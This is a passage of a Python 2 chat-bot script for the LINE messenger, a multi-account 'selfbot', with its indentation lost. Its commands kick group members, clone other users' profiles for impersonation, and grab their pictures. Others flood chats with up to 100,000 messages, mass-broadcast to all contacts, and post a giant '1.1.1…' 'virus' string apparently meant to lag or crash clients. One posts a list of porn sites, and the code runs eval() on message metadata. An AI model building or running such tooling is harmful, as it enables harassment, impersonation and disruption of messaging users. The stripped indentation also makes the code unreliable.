group.name = msg.text.replace("Gname: ","")
cl.updateGroup(group)
else:
cl.sendText(msg.to,"Tidak Dapat Mengubah Nama Grup")
elif "Kick: " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick: ","")
cl.kickoutFromGroup(msg.to,[midd])
elif msg.text in ["Invite:","ดึง:"]:
if msg.from_ in admin:
midd = msg.text.replace("Invite: ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif "My @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("My @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Copy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.cloneContactProfile(target)
cl.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy1 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy1 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki.cloneContactProfile(target)
ki.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy2 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy2 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki2.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki2.cloneContactProfile(target)
ki2.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy3 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy3 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki3.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki3.cloneContactProfile(target)
ki3.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy4 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy4 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki4.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki4.cloneContactProfile(target)
ki4.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy5 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy5 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki5.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki5.cloneContactProfile(target)
ki5.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif msg.text in ["backup"]:
try:
cl.updateDisplayPicture(mybackup.pictureStatus)
cl.updateProfile(mybackup)
cl.sendText(msg.to, "Backup Sukses Bosqu")
except Exception as e:
cl.sendText(msg.to, str (e))
elif msg.text in ["Backup"]:
try:
ki.updateDisplayPicture(backup.pictureStatus)
ki.updateProfile(backup)
ki.sendText(msg.to, "Backup Sukses Bosqu")
except Exception as e:
ki.sendText(msg.to, str (e))
elif "Bc:ct " in msg.text:
bctxt = msg.text.replace("Bc:ct ", "")
a = cl.getAllContactIds()
for manusia in a:
cl.sendText(manusia, (bctxt))
elif "Bot:ct " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Bot:ct ", "")
b = ki.getAllContactIds()
for manusia in b:
ki.sendText(manusia, (bctxt))
c = ki2.getAllContactIds()
for manusia in c:
ki2.sendText(manusia, (bctxt))
d = ki3.getAllContactIds()
for manusia in d:
ki3.sendText(manusia, (bctxt))
e = ki4.getAllContactIds()
for manusia in e:
ki4.sendText(manusia, (bctxt))
f = ki5.getAllContactIds()
for manusia in f:
ki5.sendText(manusia, (bctxt))
elif "Bc:grup " in msg.text:
bctxt = msg.text.replace("Bc:grup ", "")
a = cl.getGroupIdsJoined()
for manusia in a:
cl.sendText(manusia, (bctxt))
elif "Bot:grup " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Bot:grup ", "")
b = ki.getGroupIdsJoined()
for manusia in b:
ki.sendText(manusia, (bctxt))
c = ki2.getGroupIdsJoined()
for manusia in c:
ki2.sendText(manusia, (bctxt))
d = ki3.getGroupIdsJoined()
for manusia in d:
ki3.sendText(manusia, (bctxt))
e = ki4.getGroupIdsJoined()
for manusia in e:
ki4.sendText(manusia, (bctxt))
f = ki5.getGroupIdsJoined()
for manusia in f:
ki5.sendText(manusia, (bctxt))
elif "Spam " in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (teks+"\n")
if txt[1] == "on":
if jmlh <= 100000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of Range!")
elif txt[1] == "off":
if jmlh <= 100000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out Of Range!")
elif msg.text in ["me","Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif cms(msg.text,["แอดมิน","Creator"]):
msg.contentType = 13
msg.contentMetadata = {'mid': admsa}
cl.sendText(msg.to," My Creator ")
cl.sendMessage(msg)
cl.sendText(msg.to," Dont Kick out From group ")
elif "Inviteme: " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("Inviteme: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
elif msg.text in ["Clear grup"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
gid = ki2.getGroupIdsJoined()
gid = ki3.getGroupIdsJoined()
gid = ki4.getGroupIdsJoined()
gid = ki5.getGroupIdsJoined()
for i in gid:
ki.leaveGroup(i)
ki2.leaveGroup(i)
ki3.leaveGroup(i)
ki4.leaveGroup(i)
ki5.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Bot Sudah Keluar Di semua grup")
else:
cl.sendText(msg.to,"He declined all invitations")
elif msg.text in ["Ginfo","เชคกลุ่ม"]:
group = cl.getGroup(msg.to)
try:
gCreator = group.creator.displayName
except:
gCreator = "Error"
md = "[Nama Grup : ]\n" + group.name + "\n\n[Id Grup : ]\n" + group.id + "\n\n[Pembuat Grup :]\n" + gCreator + "\n\n[Gambar Grup : ]\nhttp://dl.profile.line-cdn.net/" + group.pictureStatus
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
cl.sendText(msg.to,md)
elif msg.text == "ไวรัส01":
cl.sendText(msg.to,"หยุดดดดดด....\nขอให้ทุกคนอยู่ในความสงบ\n\n 1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1\n\nMakasih Sudah Dilihat :)\nJangan Dikick ampun mzz :v")
elif ".music" in msg.text.lower():
songname = msg.text.lower().replace(".music","")
params = {"songname":" songname"}
r = requests.get('https://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
cl.sendMessage(msg.to, song[4])
elif ".Youtube " in msg.text:
query = msg.text.replace(".Youtube ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&List' not in a['href']:
cl.sendText(msg.to,'http://www.youtube.com' + a['href'] + a['title'])
elif "Block @" in msg.text:
if msg.toType == 2:
print "[block] OK"
_name = msg.text.replace("Block @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.blockContact(target)
cl.sendText(msg.to, "Success block contact~")
except Exception as e:
print e
elif msg.text.lower() == 'blocklist':
blockedlist = cl.getBlockedContactIds()
cl.sendText(msg.to, "Please wait...")
kontak = cl.getContacts(blockedlist)
num=1
msgs="User Blocked List\n"
for ids in kontak:
msgs+="\n%i. %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n\nTotal %i blocked user(s)" % len(kontak)
cl.sendText(msg.to, msgs)
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
#===============================================
elif msg.text in ["Invite on","เชินเปิด"]:
if msg.from_ in admin:
wait["ricoinvite"] = True
random.choice(KAC).sendText(msg.to,"🌟เปิดเชิญด้วยคอนแทค🌟")
elif msg.text in ["Invite off","ปิดเชิน"]:
if msg.from_ in admin:
wait["ricoinvite"] = False
random.choice(KAC).sendText(msg.to,"🌟ปิดเชิญ🌟")
#===============================================
elif ("Cek " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendText(msg.to,"Mid:" + key1)
elif msg.text in ["Mid","ไอดี"]:
cl.sendText(msg.to,mid)
elif msg.text in ["Link on","เปิดลิ้ง"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = False
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL open")
else:
cl.sendText(msg.to,"URL open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group ô€œô€„‰👈")
else:
cl.sendText(msg.to,"Can not be used for groups other than ô€œô€„‰")
elif msg.text in ["Link off","ปิดลิ้ง"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = True
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL close👈")
else:
cl.sendText(msg.to,"URL close👈")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group 👈")
else:
cl.sendText(msg.to,"Can not be used for groups other than ô€œ")
elif msg.text in ["url","Url"]:
if msg.toType == 2:
g = cl.getGroup(msg.to)
if g.preventJoinByTicket == True:
g.preventJoinByTicket = False
cl.updateGroup(g)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini tidak dapat digunakan di luar kelompok")
else:
cl.sendText(msg.to,"Tidak dapat digunakan untuk kelompok selain")
elif msg.text in ["Gurl","ลิ้ง"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["list"]:
gs = ki.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki.getGroup(i).name + " | [ " + str(len (ki.getGroup(i).members)) + " ]")
ki.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S2glist"]:
gs = ki2.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki2.getGroup(i).name + " | [ " + str(len (ki2.getGroup(i).members)) + " ]")
ki2.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S3glist"]:
gs = ki3.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki3.getGroup(i).name + " | [ " + str(len (ki3.getGroup(i).members)) + " ]")
ki3.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S4glist"]:
gs = ki4.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki4.getGroup(i).name + " | [ " + str(len (ki4.getGroup(i).members)) + " ]")
ki4.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S5glist"]:
gs = ki5.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[���] %s \n" % (ki5.getGroup(i).name + " | [ " + str(len (ki5.getGroup(i).members)) + " ]")
ki5.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text == "ลิ้ง":
ki.sendText(msg.to,"nekopoi.host")
ki.sendText(msg.to,"sexvideobokep.com")
ki.sendText(msg.to,"memek.com")
ki.sendText(msg.to,"pornktube.com")
ki.sendText(msg.to,"faketaxi.com")
ki.sendText(msg.to,"videojorok.com")
ki.sendText(msg.to,"watchmygf.mobi")
ki.sendText(msg.to,"xnxx.com")
ki.sendText(msg.to,"pornhd.com")
ki.sendText(msg.to,"xvideos.com")
ki.sendText(msg.to,"vidz7.com")
ki.sendText(msg.to,"m.xhamster.com")
ki.sendText(msg.to,"xxmovies.pro")
ki.sendText(msg.to,"youporn.com")
ki.sendText(msg.to,"pornhub.com")
ki.sendText(msg.to,"anyporn.com")
ki.sendText(msg.to,"hdsexdino.com")
ki.sendText(msg.to,"rubyourdick.com")
ki.sendText(msg.to,"anybunny.mobi")
ki.sendText(msg.to,"cliphunter.com")
ki.sendText(msg.to,"sexloving.net")
ki.sendText(msg.to,"free.goshow.tv")
ki.sendText(msg.to,"eporner.com")
ki.sendText(msg.to,"Pornhd.josex.net")
ki.sendText(msg.to,"m.hqporner.com")
ki.sendText(msg.to,"m.spankbang.com")
ki.sendText(msg.to,"m.4tube.com")
ki.sendText(msg.to,"brazzers.com")
#-----------------------------------------------------------
elif "#leave" in msg.text:
try:
import sys
sys.exit()
except:
pass
#-----------------------------------------------------------
elif "Speed" in msg.text:
start = time.time()
cl.sendText(msg.to, "ᴘʀᴏɢʀᴇss...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
ki2.sendText(msg.to, "%sseconds" % (elapsed_time))
ki3.sendText(msg.to, "%sseconds" % (elapsed_time))
ki4.sendText(msg.to, "%sseconds" % (elapsed_time))
ki5.sendText(msg.to, "%sseconds" % (elapsed_time))
#-----------------------------------------------
elif "Sp" in msg.text:
start = time.time()
cl.sendText(msg.to, "ᴘʀᴏɢʀᴇss...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
#-----------------------------------------------
elif msg.text.lower() == 'respons':
profile = ki.getProfile()
text = profile.displayName
ki.sendText(msg.to, text)
profile = ki2.getProfile()
text = profile.displayName
ki2.sendText(msg.to, text)
profile = ki3.getProfile()
text = profile.displayName
ki3.sendText(msg.to, text)
profile = ki4.getProfile()
text = profile.displayName
ki4.sendText(msg.to, text)
profile = ki4.getProfile()
text = profile.displayName
ki5.sendText(msg.to, text)
profile = ki5.getProfile()
#------------------------------------------------------------------
elif "Steal home @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Steal home @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
#------------------------------------------------------------------
elif ("Ban " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
